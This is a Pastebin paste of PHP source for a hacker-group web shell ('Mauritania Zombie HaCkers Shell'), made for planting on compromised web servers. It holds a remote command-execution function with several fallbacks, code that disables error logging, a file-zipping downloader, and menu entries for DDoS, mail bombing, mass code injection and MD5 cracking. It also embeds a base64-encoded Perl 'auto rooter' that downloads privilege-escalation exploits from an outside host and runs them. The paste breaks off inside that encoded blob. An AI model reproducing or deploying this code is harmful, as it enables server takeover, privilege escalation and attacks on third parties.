0xspade

mauritania Attacker Priv8 Shell

Sep 13th, 2016
317
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 88.21 KB | None | 0 0
  1. <?php
  2. /*
  3. []========================================
  4. []--------------Anonymous Shell-----------------
  5. []----------------------------------------
  6. []========================================
  7. []>>>>>>>>> c0d3d by @Mauritania Attacker <<<<<<<<<<
  8. []========================================
  9. []+  Email: Mauritania@hacker.ps         +
  10. []+  Facebook : www.facebook.com/mauritanie.forever    +
  11. []========================================
  12. []
  13. []
  14. []
  15. []
  16. []
  17. []
  18. []
  19. []
  20. []
  21. []  C0de For @Mauritania
  22. []  Hack For @Mauritania
  23. []  Live for @Mauritania Zombie HaCkers
  24. []
  25. []
  26.  
  27. Mauritania Zombie HaCkers
  28. */
  29.  
  30. ini_set('max_execution_time',0);
  31. ini_set('memory_limit','999999999M');
  32.  
  33.  
  34. function Zip($source, $destination) // Thanks to Alix Axel
  35. {
  36.     if (!extension_loaded('zip') || !file_exists($source)) {
  37.         return false;
  38.     }
  39.  
  40.     $zip = new ZipArchive();
  41.     if (!$zip->open($destination, ZIPARCHIVE::CREATE)) {
  42.         return false;
  43.     }
  44.  
  45.     $source = str_replace('\\', '/', realpath($source));
  46.  
  47.     if (is_dir($source) === true)
  48.     {
  49.         $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  50.  
  51.         foreach ($files as $file)
  52.         {
  53.             $file = str_replace('\\', '/', realpath($file));
  54.  
  55.             if (is_dir($file) === true)
  56.             {
  57.                 $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  58.             }
  59.             else if (is_file($file) === true)
  60.             {
  61.                 $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  62.             }
  63.         }
  64.     }
  65.     else if (is_file($source) === true)
  66.     {
  67.         $zip->addFromString(basename($source), file_get_contents($source));
  68.     }
  69.  
  70.     return $zip->close();
  71. }
  72.  
  73. if(isset($_GET['zip'])) {
  74.     $src = $_GET['zip'];
  75.     $dst = getcwd()."/".basename($_GET['zip']).".zip";
  76.     if (Zip($src, $dst) != false) {
  77.         $filez = file_get_contents($dst);
  78.         header("Content-type: application/octet-stream");
  79.         header("Content-length: ".strlen($filez));
  80.         header("Content-disposition: attachment; filename=\"".basename($dst)."\";");
  81.         echo $filez;
  82.     }
  83.     exit;
  84. }
  85.  
  86. // ------------------------------------- Some header Functions (Need to be on top) ---------------------------------\
  87.  
  88. /**************** Defines *********************************/
  89.  
  90. $greeting         = "r00ted By: @Mauritania Attacker";
  91. $user             = "anonymous";
  92. $pass             = "rim123";
  93. $lock             = "on"; // set this to off if you dont need the login page
  94. $antiCrawler         = "off"; // set this to on if u dont want your shell to be publicised in Search Engines ! (It increases the shell's Life')
  95. $tracebackFeature     = "off"; // set this feature to on to enable email alerts
  96. $ownerEmail         = "mauritania@hacker.ps"; // Change this to your email , This email is used to deliver tracebacks about your shell
  97. $url             = (!empty($_SERVER['HTTPS'])) ? "https://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'] : "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
  98. $phpVersion        = phpversion();
  99. $self            = $_SERVER["PHP_SELF"]; // Where am i
  100. $sm             = @ini_get('safe_mode');
  101. $SEPARATOR         = '/'; // Default Directory separator
  102. $os             = "N/D";
  103.  
  104. if(stristr(php_uname(),"Windows"))
  105. {
  106.         $SEPARATOR = '\\';
  107.         $os = "Windows";
  108. }
  109.  
  110. else if(stristr(php_uname(),"Linux"))
  111. {
  112.         $os = "Linux";
  113. }
  114.  
  115. //*************************************************************/
  116.  
  117. // -------------- Traceback Functions
  118.  
  119. function sendLoginAlert()
  120. {
  121.     global $ownerEmail;
  122.     global $url;
  123.     $accesedIp = $_SERVER['REMOTE_ADDR'];
  124.     $randomInt = rand(0,1000000);           # to avoid id blocking
  125.    $from = "ani-shell$randomInt@fbi.gov";
  126.    
  127.     //echo $from;
  128.    
  129.     if(function_exists('mail'))
  130.     {
  131.         $subject = "Shell Accessed -- Ani-Shell --";
  132.         $message = "
  133. Hey Owner ,
  134.        
  135.        Your Shell(Anonymous-Shell) located at $url was accessed by $accesedIp
  136.        
  137.        If its not you :-
  138.        
  139.        1. Please check if the shell is secured.
  140.        2. Change your user name and Password.
  141.        3. Check if lock is 0n!
  142.  
  143.        Thanking You
  144.        
  145. Yours Faithfully
  146. Mauritania Zombie HaCkers Shell
  147.        ";
  148.         mail($ownerEmail,$subject,$message,'From:'.$from);
  149.     }
  150. }
  151.  
  152. //---------------------------------------------------------
  153.  
  154.  
  155. if(function_exists('session_start') && $lock == 'on')
  156. {
  157.     session_start();
  158. }
  159. else
  160. {
  161.     // The lock will be set to 'off' if the session_start fuction is disabled i.e if sessions are not supported
  162.     $lock = 'off';
  163. }
  164.  
  165. //logout
  166.  
  167. if(isset($_GET['logout']) && $lock == 'on')
  168. {
  169.     $_SESSION['authenticated'] = 0;
  170.     session_destroy();
  171.     header("location: ".$_SERVER['PHP_SELF']);
  172. }
  173.  
  174. ini_set('max_execution_time',0);
  175.  
  176.  
  177.  
  178. /***************** Restoring *******************************/
  179.  
  180.  
  181. ini_restore("safe_mode_include_dir");
  182. ini_restore("safe_mode_exec_dir");
  183. ini_restore("disable_functions");
  184. ini_restore("allow_url_fopen");
  185. ini_restore("safe_mode");
  186. ini_restore("open_basedir");
  187.  
  188. if(function_exists('ini_set'))
  189. {
  190.     ini_set('error_log',NULL);  // No alarming logs
  191.     ini_set('log_errors',0);    // No logging of errors
  192.     ini_set('file_uploads',1);  // Enable file uploads
  193.     ini_set('allow_url_fopen',1);   // allow url fopen
  194. }
  195.  
  196. else
  197. {
  198.     ini_alter('error_log',NULL);
  199.     ini_alter('log_errors',0);
  200.     ini_alter('file_uploads',1);
  201.     ini_alter('allow_url_fopen',1);
  202. }
  203.  
  204. // ----------------------------------------------------------------------------------------------------------------
  205.  
  206.  
  207. ?>
  208. <html>
  209. <head>
  210. <title>Mauritania Zombie HaCkers Shell</title>
  211.  
  212. <?php
  213. if($antiCrawler != 'off')
  214. {
  215.     ?>
  216.     <meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
  217.     <?php
  218. }
  219. ?>
  220.  
  221. <style>
  222.  
  223. /*
  224. ==========================    
  225.     CSS Section
  226. ==========================
  227. */
  228.  
  229. * {
  230.     padding:0;
  231.     margin:0;
  232. }
  233.  
  234. html, body {
  235.     height: 100%;
  236. }
  237.  
  238. #container {
  239. min-height: 100%;
  240. margin-bottom: -330px;
  241. position: relative;
  242. }
  243.  
  244. #footer {
  245. height: 330px;
  246. position: relative;
  247. }
  248.  
  249. .clearfooter {
  250. height: 330px;
  251. clear: both;
  252. }
  253.  
  254. .alert
  255. {
  256.     background:red;
  257.     color:white;
  258.     font-weight:bold;
  259. }
  260. td.info
  261. {
  262.     width:0px;
  263. }
  264.  
  265. .bind
  266. {
  267.     border: 1px solid #333333;
  268.     margin: 15px auto 0;
  269.     font-size: small;
  270. }
  271.  
  272. div.end *
  273. {
  274.     font-size:small;
  275. }
  276.  
  277. div.end
  278. {
  279.     width:100%;
  280.     background:#222;
  281. }
  282.  
  283. p.blink
  284. {
  285.     text-decoration: blink;
  286. }
  287.  
  288. body
  289. {
  290.     background-color:black;
  291.     color:rgb(35,182,39);
  292.     font-family:Tahoma,Verdana,Arial;
  293.     font-size: small;
  294. }
  295.  
  296. input.own {
  297.     background-color: Green;
  298.     color: white;
  299.     border : 1px solid #ccc;
  300. }
  301.  
  302. blockquote.small
  303. {
  304.     font-size: smaller;
  305.     color: silver;
  306.     text-align: center;
  307. }
  308.  
  309. table.files
  310. {
  311.     border-spacing: 10px;
  312.     font-size: small;
  313. }
  314.  
  315. h1 {
  316.     padding: 4px;
  317.     padding-bottom: 0px;
  318.     margin-right : 5px;
  319. }
  320. div.logo
  321. {
  322.     border-right: 1px aqua solid;
  323. }
  324. div.header
  325. {
  326.     padding-left: 5px;
  327.     font-size: small;
  328.     text-align: left;
  329. }
  330. div.nav
  331. {
  332.     margin-top:1px;
  333.     height:60px;
  334.     background-color: #ccc;
  335. }
  336. div.nav ul
  337. {
  338.     list-style: none;
  339.     padding: 4px;
  340. }
  341. div.nav li
  342. {
  343.     float: left;
  344.     margin-right: 10px;
  345.     text-align:center;
  346. }
  347. textarea.cmd
  348. {
  349.     border : 1px solid #111;
  350.     background-color : green;
  351.     font-family: Shell;
  352.     color : white;
  353.     margin-top: 30px;
  354.     font-size:small;
  355. }
  356.  
  357. input.cmd
  358. {
  359.     background-color:black;
  360.     color: white;
  361.     width: 400px;
  362.     border : 1px solid #ccc;
  363.  
  364. }
  365. td.maintext
  366. {
  367.     font-size: large;
  368. }
  369. #margins
  370. {
  371.     margin-left: 10px;
  372.     margin-top: 10px;
  373.     color:white;
  374. }
  375. table.top
  376. {
  377.     border-bottom: 1px solid aqua;
  378.     width: 100%;
  379. }
  380. #borders
  381. {
  382.     border-top : 1px solid aqua;
  383.     border-left:1px solid aqua;
  384.     border-bottom: 1px solid aqua;
  385.     border-right: 1px solid aqua;
  386.     margin-bottom:0;
  387. }
  388. td.file a , .file a
  389. {
  390.     text-decoration:none;
  391. }
  392. a.dir
  393. {
  394.     font-weight:bold;
  395.     text-decoration:none;
  396. }
  397. td.dir a
  398. {
  399.     text-decoration:none;
  400. }
  401. td.download,td.download2
  402. {
  403.     color:green;
  404. }
  405. #spacing
  406. {
  407.     padding:10px;
  408.     margin-left:200px;
  409. }
  410. th.header
  411. {
  412.     background: none repeat scroll 0 0 #191919;
  413.     color: white;
  414.     border-bottom : 1px solid #333333;
  415. }
  416. p.alert_red
  417. {
  418.     background : red;
  419.     color: white;
  420. }
  421.  
  422. p.alert_green
  423. {
  424.     background : lightgreen;
  425.     color: black;
  426. }
  427. /*
  428.  
  429. --------------------------------CSS END------------------------------------------------------
  430.  
  431. */
  432. </style>
  433.  
  434. </head>
  435.  
  436. <body text="rgb(39,245,10)" bgcolor="black">
  437.  
  438. <div id='container'>
  439. <?php
  440. if(isset($_POST['user']) && isset($_POST['pass']) && $lock == 'on')
  441. {
  442.     if( $_POST['user'] == $user &&
  443.          $_POST['pass'] == $pass )
  444.     {
  445.             $_SESSION['authenticated'] = 1;
  446.             // --------------------- Tracebacks --------------------------------
  447.             if($tracebackFeature == 'On')
  448.             {
  449.                 sendLoginAlert();
  450.             }
  451.             // ------------------------------------------------------------------
  452.     }
  453. }
  454.  
  455. if($lock == 'off')
  456. {?>
  457.     <p class="alert_red"><b>Lock is Switched Off! , The shell can be accessed by anyone!</b></p>
  458. <?php
  459. }
  460.  
  461. if($lock == 'on' && (!isset($_SESSION['authenticated']) || $_SESSION['authenticated']!=1) )
  462. {
  463.  
  464. ?>
  465. <table>
  466.     <tbody>
  467.         <tr>
  468.             <td width="500px">
  469.         <pre>
  470. <font color="Orange">
  471. <b>
  472. []========================================
  473. []--------------Mauritania Zombie HaCkers Shell-----------------
  474. []----------------------------------------</font><font color="white">
  475. []========================================
  476. []>>>>>>>>> c0d3d by Mauritania Attacker <<<<<<<<<<
  477. []========================================</font><font color="rgb(35,182,39)">
  478. []   Email: Mauritania@hacker.ps        +
  479. []   Twitter : www.facebook.com/mauritanie.forever   +
  480. []========================================</font><font color="grey">
  481. []
  482. []
  483. []
  484. []
  485. []
  486. []
  487. []
  488. []
  489. []
  490. []  C0de For Mauritania Zombie HaCkers
  491. []  Hack For Mauritania
  492. []  Live for Mauritania
  493. []
  494. []
  495. </b>
  496. </pre>
  497.             </td>
  498.             <td>
  499.                    <?php
  500.                    // <div id="wassup">
  501.                    //      include("http://ani-shell.sourceforge.net/wassup.txt");
  502.                    //</div>
  503.                    ?>
  504.                    
  505.  
  506.                 <h1><?php echo $greeting;?></h1><br /><br />
  507.                 <form method="POST" action="<?php echo $_SERVER['PHP_SELF'];?>">
  508.                 <input name="user" value="Username"/> <input name="pass" type="password" value="Password"/> <input class="own" type="Submit" value="Own This Box!"/>
  509.                 </form>
  510.             </td>
  511.         </tr>
  512.     </tbody>
  513. </table>
  514. <?php
  515. }
  516. //---------------------------------- We are authenticated now-------------------------------------
  517. //Launch the shell
  518. else
  519. {
  520.     //---------------------------------- Fuctions ---------------------------------------------------
  521.  
  522.     function showDrives()
  523.     {
  524.         global $self;
  525.         foreach(range('A','Z') as $drive)
  526.         {
  527.             if(is_dir($drive.':\\'))
  528.             {
  529.                 ?>
  530.                 <a class="dir" href='<?php echo $self ?>?dir=<?php echo $drive.":\\"; ?>'>
  531.                     <?php echo $drive.":\\" ?>
  532.                 </a>
  533.                 <?php
  534.             }
  535.         }
  536.     }
  537.  
  538.     function HumanReadableFilesize($size)
  539.     {
  540.  
  541.         $mod = 1024;
  542.  
  543.         $units = explode(' ','B KB MB GB TB PB');
  544.         for ($i = 0; $size > $mod; $i++)
  545.         {
  546.             $size /= $mod;
  547.         }
  548.  
  549.         return round($size, 2) . ' ' . $units[$i];
  550.     }
  551.  
  552. function getClientIp()
  553. {
  554.     echo $_SERVER['REMOTE_ADDR'];
  555. }
  556.  
  557. function getServerIp()
  558. {
  559.     echo getenv('SERVER_ADDR');
  560. }
  561. function getSoftwareInfo()
  562. {
  563.     echo php_uname();
  564. }
  565. function diskSpace()
  566. {
  567.     echo HumanReadableFilesize(disk_total_space("/"));
  568. }
  569. function freeSpace()
  570. {
  571.     echo HumanReadableFilesize(disk_free_space("/"));
  572. }
  573. function getSafeMode()
  574. {
  575.         global $sm;
  576.         echo($sm?"ON (Most of the Features will Not Work)":"OFF");
  577.        
  578. }
  579.  
  580. function getDisabledFunctions()
  581. {
  582.     if(!ini_get('disable_functions'))
  583.     {
  584.         echo "None";
  585.     }
  586.     else
  587.     {
  588.             echo @ini_get('disable_functions');
  589.     }
  590. }
  591.  
  592. function getFilePermissions($file)
  593. {
  594.    
  595. $perms = fileperms($file);
  596.  
  597. if (($perms & 0xC000) == 0xC000) {
  598.     // Socket
  599.     $info = 's';
  600. } elseif (($perms & 0xA000) == 0xA000) {
  601.     // Symbolic Link
  602.     $info = 'l';
  603. } elseif (($perms & 0x8000) == 0x8000) {
  604.     // Regular
  605.     $info = '-';
  606. } elseif (($perms & 0x6000) == 0x6000) {
  607.     // Block special
  608.     $info = 'b';
  609. } elseif (($perms & 0x4000) == 0x4000) {
  610.     // Directory
  611.     $info = 'd';
  612. } elseif (($perms & 0x2000) == 0x2000) {
  613.     // Character special
  614.     $info = 'c';
  615. } elseif (($perms & 0x1000) == 0x1000) {
  616.     // FIFO pipe
  617.     $info = 'p';
  618. } else {
  619.     // Unknown
  620.     $info = 'u';
  621. }
  622.  
  623. // Owner
  624. $info .= (($perms & 0x0100) ? 'r' : '-');
  625. $info .= (($perms & 0x0080) ? 'w' : '-');
  626. $info .= (($perms & 0x0040) ?
  627.             (($perms & 0x0800) ? 's' : 'x' ) :
  628.             (($perms & 0x0800) ? 'S' : '-'));
  629.  
  630. // Group
  631. $info .= (($perms & 0x0020) ? 'r' : '-');
  632. $info .= (($perms & 0x0010) ? 'w' : '-');
  633. $info .= (($perms & 0x0008) ?
  634.             (($perms & 0x0400) ? 's' : 'x' ) :
  635.             (($perms & 0x0400) ? 'S' : '-'));
  636.  
  637. // World
  638. $info .= (($perms & 0x0004) ? 'r' : '-');
  639. $info .= (($perms & 0x0002) ? 'w' : '-');
  640. $info .= (($perms & 0x0001) ?
  641.             (($perms & 0x0200) ? 't' : 'x' ) :
  642.             (($perms & 0x0200) ? 'T' : '-'));
  643.  
  644. return $info;
  645.  
  646. }
  647.  
  648. // Dir size
  649.  
  650. /**
  651.  * Get the directory size
  652.  * @param directory $directory
  653.  * @return integer
  654.  */
  655. function dirSize($directory) {
  656.     $size = 0;
  657.     foreach(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory)) as $file){
  658.         try {      
  659.             $size += $file->getSize();
  660.         }
  661.         catch (Exception $e){    // Symlinks and other shits
  662.             $size += 0;
  663.         }
  664.     }
  665.     return $size;
  666. }
  667.  
  668. /***********************************************************/
  669. // exec_all , A function used to execute commands , This function will only execute if the Safe Mode is
  670. // Turned OFF!
  671. /**********************************************************/
  672.  
  673.  
  674. function exec_all($command)
  675. {
  676.    
  677.     $output = '';
  678.     if(function_exists('exec'))
  679.     {  
  680.         exec($command,$output);
  681.         $output = join("\n",$output);
  682.     }
  683.    
  684.     else if(function_exists('shell_exec'))
  685.     {
  686.         $output = shell_exec($command);
  687.     }
  688.    
  689.     else if(function_exists('popen'))
  690.     {
  691.         $handle = popen($command , "r"); // Open the command pipe for reading
  692.         if(is_resource($handle))
  693.         {
  694.             if(function_exists('fread') && function_exists('feof'))
  695.             {
  696.                 while(!feof($handle))
  697.                 {
  698.                     $output .= fread($handle, 512);
  699.                 }
  700.             }
  701.             else if(function_exists('fgets') && function_exists('feof'))
  702.             {
  703.                 while(!feof($handle))
  704.                 {
  705.                     $output .= fgets($handle,512);
  706.                 }
  707.             }
  708.         }
  709.         pclose($handle);
  710.     }
  711.    
  712.    
  713.     else if(function_exists('system'))
  714.     {
  715.         ob_start(); //start output buffering
  716.         system($command);
  717.         $output = ob_get_contents();    // Get the ouput
  718.         ob_end_clean();                 // Stop output buffering
  719.     }
  720.    
  721.     else if(function_exists('passthru'))
  722.     {
  723.         ob_start(); //start output buffering
  724.         passthru($command);
  725.         $output = ob_get_contents();    // Get the ouput
  726.         ob_end_clean();                 // Stop output buffering            
  727.     }
  728.    
  729.     else if(function_exists('proc_open'))
  730.     {
  731.         $descriptorspec = array(
  732.                 1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
  733.                 );
  734.         $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
  735.         if(is_resource($handle))
  736.         {
  737.             if(function_exists('fread') && function_exists('feof'))
  738.             {
  739.                 while(!feof($pipes[1]))
  740.                 {
  741.                     $output .= fread($pipes[1], 512);
  742.                 }
  743.             }
  744.             else if(function_exists('fgets') && function_exists('feof'))
  745.             {
  746.                 while(!feof($pipes[1]))
  747.                 {
  748.                     $output .= fgets($pipes[1],512);
  749.                 }
  750.             }
  751.         }
  752.         pclose($handle);
  753.     }
  754.  
  755.     return(htmlspecialchars($output));
  756.    
  757. }
  758.  
  759. function magicQuote($text)
  760. {
  761.     if (!get_magic_quotes_gpc())
  762.     {
  763.         return $text;
  764.     }
  765.     return stripslashes($text);
  766. }
  767.  
  768. function md5Crack($hash , $list)
  769. {
  770.     $fd = fopen($list,"r");
  771.     if( strlen($hash) != 32  || $fd == FALSE)
  772.     {
  773.         // echo "$hash , " . strlen($hash) ." , $list , $fd"; // Debugging
  774.         return "<p class='alert_red'>Hash or List invalid!</p>";
  775.     }
  776.     else
  777.     {
  778.         while (! feof( $fd ))
  779.         {
  780.             if( ($pwdList = fgets( $fd, 1024 )) == FALSE)
  781.             {
  782.                 break;
  783.             }
  784.             $pwdList = trim($pwdList);
  785.            
  786.             if(md5($pwdList) == $hash )
  787.             {
  788.                     return "<script>alert('Password Cracked');</script>\n<h2>Hash Cracked</h2><br /><br />\n<p class='alert_green'>Planintext : $pwdList</p>";
  789.             }
  790.         }
  791.            
  792.     }
  793. }
  794.  
  795. function exec_query_mysql($query,$sql_server,$sql_port,$sql_db,$sql_user,$sql_pass)
  796. {
  797.     $link = mysql_connect($sql_server.":".$port,$sql_user,$sql_pass);
  798.     if(!$link)
  799.     {
  800.         return 'Could not connect: ' . mysql_error();
  801.     }
  802.     $resource = mysql_query($query);
  803.     if(!$resource) return(mysql_error());
  804. }
  805.  
  806. //------------------------------------------------------------------------------------------------
  807.  
  808.  
  809. ?>
  810.  
  811. <table class="top">
  812.     <tbody>
  813.         <tr>
  814.             <td width="300px;">
  815.             <div class="logo">
  816.                 <img src="http://i45.tinypic.com/14kv8qq.gif" />
  817.             </div>
  818.             </td>
  819.             <td>
  820.             <div class="header">
  821.             <?php getSoftwareInfo(); ?><br />
  822. Your IP : <?php getClientIp(); ?> <font color="silver" >|</font> Server IP : <?php getServerIp();?> <br />
  823.             Safe Mode : <?php getSafeMode(); ?><br />
  824.             <?php if($os == 'Windows'){ echo showDrives();} ?> <?php echo getcwd();?>
  825.             </div>
  826.             </td>
  827.         </tr>
  828.     </tbody>
  829. </table>
  830. <div class="header" id="borders">
  831.             Server ADMIN: <?php echo $_SERVER['SERVER_ADMIN'];?> <font color="silver" >|</font>
  832.             PHP VERSION : <?php echo $phpVersion; ?> <font color="silver" >|</font>
  833.             Curl : <?php echo function_exists('curl_version')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver" >|</font>
  834.             Oracle : <?php echo function_exists('ocilogon')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver" >|</font>
  835.             MySQL : <?php  echo function_exists('mysql_connect')?("<font color='red'>Enabled</font>"):("Disabled");?> <font color="silver" >|</font>
  836.             MSSQL : <?php echo function_exists('mssql_connect')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver" >|</font>
  837.             PostgreSQL : <?php echo function_exists('pg_connect')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver" >|</font>
  838.             Disable functions : <?php getDisabledFunctions(); ?> <font color="silver" >|</font>
  839.             Space : <?php diskSpace(); ?> <font color="silver" >|</font>
  840.             Free : <?php freeSpace(); ?>
  841.         </table>
  842. </div>
  843. <div class="nav">
  844. <ul>
  845.     <li><a href="<?php echo $self;?>">Home</a></li>
  846.     <li><a href="<?php echo $self.'?upload';?>">Upload</a></li>
  847.     <li><a href="<?php echo $self.'?shell';?>">Shell</a></li>
  848.     <li><a href="<?php echo $self.'?r00t'?>">Aut0 R00t3r (Unix/Linux)</a></li>
  849.     <li><a href="<?php echo $self.'?dos';?>">DDoS</a></li>
  850.     <li><a href="<?php echo $self.'?fuzz';?>">Web-Server Fuzzer</a></li>
  851.     <li><a href="<?php echo $self.'?mail'?>">Mass Mailer</a></li>
  852.     <li><a href="<?php echo $self.'?bomb'?>">Mail Bomber</a></li>
  853.     <li><a href="<?php echo $self.'?connect'?>">Connect</a></li>
  854.     <li><a href="<?php echo $self.'?injector'?>">Mass Code Injector</a></li>
  855.     <li><a href="<?php echo $self.'?obfuscate'?>">PHP Obfuscator</a></li>
  856.     <li><a href="<?php echo $self.'?eval'?>">PHP Evaluate</a></li>
  857.     <li><a href="<?php echo $self.'?md5'?>">MD5 Cracker</a></li>
  858.     <li><a href="<?php echo $self.'?gdork'?>">Google Dork Creator</a></li>
  859.  
  860.  
  861.     <?php if($lock == 'on')
  862.     {
  863.     ?>
  864.         <li><a href="<?php echo $self.'?logout'?>">I m Out!</a></li>
  865.     <?php
  866.     }
  867.     ?>
  868. </ul>
  869. </div>
  870.  
  871. <center>
  872. <?php
  873. //-------------------------------- Check what he wants -------------------------------------------
  874.  
  875. // Shell
  876.  
  877. if(isset($_GET['shell']))
  878. {
  879.     if(!isset($_GET['cmd']) || $_GET['cmd'] == '')
  880.     {
  881.         $result = "";    
  882.     }
  883.     else
  884.     {
  885.         $result=exec_all($_GET['cmd']);
  886.     }
  887.     ?>
  888.     <textarea class="cmd" cols="100" rows="20"><?php echo $result;?></textarea><br /><br />
  889.     <form action="<?php echo $self;?>" method="GET">
  890.     <!-- For Shell -->
  891.     <input name="shell" type="hidden" />
  892.     <!-- For CMD -->
  893.     <input name="cmd" class="cmd" />
  894.     <input name="submit" value="Spin That Shit!" class="own" type="submit" />
  895.     </form>
  896.     <?php
  897. }
  898.  
  899. // Auto Rooter (Linux/Unix Only!) with Perl Installed
  900.  
  901. else if(isset($_GET['r00t']))
  902. {
  903.     // Note : The Perl Auto Rooter Perl Script was originally written by iskorpitx , All credits to him for an awesome
  904.     // Piece of code , and thanks to eXes0ul for providing me the links . ;)
  905.    
  906.     $r00t =
  907. "IyEvdXNyL2Jpbi9wZXJsIA0KIyBFeHBsb2l0IHRvb2xzIHYyLjAgY29kZWQgYnkgaXNrb3JwaXR4
  908. IChUdXJraXNoIEhhY2tlcikNCiMgbGludXggc2VydmVybGVyZGUgZ2VjZXJsaWRpcg0KIyBpeWkg
  909. c2Fuc2xhcjopDQojIGJ5IGlza29ycGl0eA0KeyANCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3
  910. MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvaXNrb3JwaXR4Iik7ICANCnN5c3RlbSgiY2htb2QgNzc3
  911. IGlza29ycGl0eCIpOyANCnN5c3RlbSgiLi9pc2tvcnBpdHgiKTsgDQpzeXN0ZW0oImlkIik7IA0K
  912. c3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy80NCIpOyAg
  913. DQpzeXN0ZW0oImNobW9kIDc3NyA0NCIpOyANCnN5c3RlbSgiLi80NCIpOyANCnN5c3RlbSgiaWQi
  914. KTsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvOTUy
  915. MSIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyA5NTIxIik7IA0Kc3lzdGVtKCIuLzk1MjEiKTsgDQpz
  916. eXN0ZW0oImlkIik7ICANCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVT
  917. L2ZpbGUvY2MvZnJvb3QiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgZnJvb3QiKTsgDQpzeXN0ZW0o
  918. Ii4vZnJvb3QiKTsgDQpzeXN0ZW0oImlkIik7DQpzeXN0ZW0oImlkIik7DQpzeXN0ZW0oImlkIik7
  919. DQpzeXN0ZW0oImlkIik7DQpzeXN0ZW0oImlkIik7DQpzeXN0ZW0oIndnZXQgMjc3MDQuYyBkb3du
  920. bG9hZHMuc2VjdXJpdHlmb2N1cy5jb20vdnVsbmVyYWJpbGl0aWVzL2V4cGxvaXRzLzI3NzA0LmMi
  921. KTsgDQpzeXN0ZW0oImdjYyAyNzcwNC5jIC1vIDI3NzA0Iik7ICANCnN5c3RlbSgiY2htb2QgNzc3
  922. IDI3NzA0Iik7IA0Kc3lzdGVtKCIuLzI3NzA0Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnByaW50ICJJ
  923. ZiB1IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8v
  924. d2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvMTgtMS5jIik7IA0Kc3lzdGVtKCJnY2MgLVdh
  925. bGwgLW8gMTgtMSAxOC0xLmMiKTsgDQpzeXN0ZW0oImdjYyAtV2FsbCAtbTY0IC1vIDE4LTMgMTgt
  926. MS5jIik7IA0Kc3lzdGVtKCJjaG1vZCA3NzcgMTgtMSIpOyANCnN5c3RlbSgiY2htb2QgNzc3IDE4
  927. LTMiKTsgDQpzeXN0ZW0oIi4vMTgtMSIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4vMTgt
  928. MyIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBj
  929. dHJsK2NcbiI7DQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NNU19GSUxFUy9maWxl
  930. L2NjLzE4LTIiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgMTgtMiIpOyANCnN5c3RlbSgiLi8xOC0y
  931. Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0
  932. cmwrY1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUv
  933. Y2MvMTgtMSIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyAxOC0xIik7IA0Kc3lzdGVtKCIuLzE4LTEi
  934. KTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3Ry
  935. bCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9j
  936. Yy9ydW4iKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgcnVuIik7IA0Kc3lzdGVtKCIuL3J1biIpOyAN
  937. CnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2Nc
  938. biI7DQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2NjL2V4
  939. cGxvaXQuYyIpOyAgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7
  940. DQpzeXN0ZW0oIndnZXQgcnVuX2V4cGxvaXRzLnNoIHdnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NN
  941. U19GSUxFUy9maWxlL2NjL3J1bl9leHBsb2l0cy5zaCIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyBy
  942. dW5fZXhwbG9pdHMuc2giKTsgDQpzeXN0ZW0oIi4vcnVuX2V4cGxvaXRzLnNoIik7IA0KcHJpbnQg
  943. IklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0IGh0dHA6
  944. Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9leHBsb2l0Iik7ICANCnN5c3RlbSgiY2ht
